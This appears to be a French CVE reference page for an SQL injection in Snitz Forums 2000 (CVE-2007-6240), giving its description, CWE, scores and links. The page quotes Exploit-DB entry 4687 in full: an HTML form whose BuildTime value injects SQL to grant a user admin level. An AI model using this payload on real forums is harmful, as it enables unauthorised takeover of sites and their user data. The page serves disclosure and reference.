CVE-2007-6240 : Détail

CVE-2007-6240

SQL Injection
A03-Injection
0.45%V4
Network
2007-12-05
10h00 +00:00
2018-10-15
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in active.asp in Snitz Forums 2000 3.4.06 allows remote attackers to execute arbitrary SQL commands via the BuildTime parameter.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4687

Date de publication : 2007-12-02 23h00 +00:00
Auteur : BugReport.IR
EDB Vérifié : Yes

########################## WwW.BugReport.IR ######################### # # AmnPardaz Security Research & Penetration Testing Group # # Title: A user can gain admin level in snitz 2000 by SQL Injection # vendor: http://forum.snitz.com/ # Googling: "Powered by Snitz" > 2,440,000 victims # Last bug report in 2007-02-16 with 4692 visitors # Exploit: Available # Fix Available: Update to last version. ######################## Bug Description ########################### A user can gain admin level in the forum and can access to the forum. It is because of a SQL Injection in "Active.asp" After login to your VICTIM forum, execute below script ~~~~~~~~~~~Start HTML Exploit~~~~~~~~~ <form action="http://[VICTIM URL]/active.asp" method="post"> Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br /> DefaultValues: <input type="text" name="AllRead" value="Y" /><br /> Submit: <input type="submit" name="submit" value="Submit" /><br /> </form> ~~~~~~~~~~~End HTML Exploit~~~~~~~~~ ##################################################################### # Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com # Country: Iran # Contact: admin@bugreport.ir # Credit: Soroush Dalili found this bug. ##################################################################### # milw0rm.com [2007-12-03]

Products Mentioned

Configuraton 0

Snitz_communications>>Snitz_forums_2000 >> Version 3.4.06

Références

http://osvdb.org/39002
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/27911
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/26688
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4687
Tags : exploit, x_refsource_EXPLOIT-DB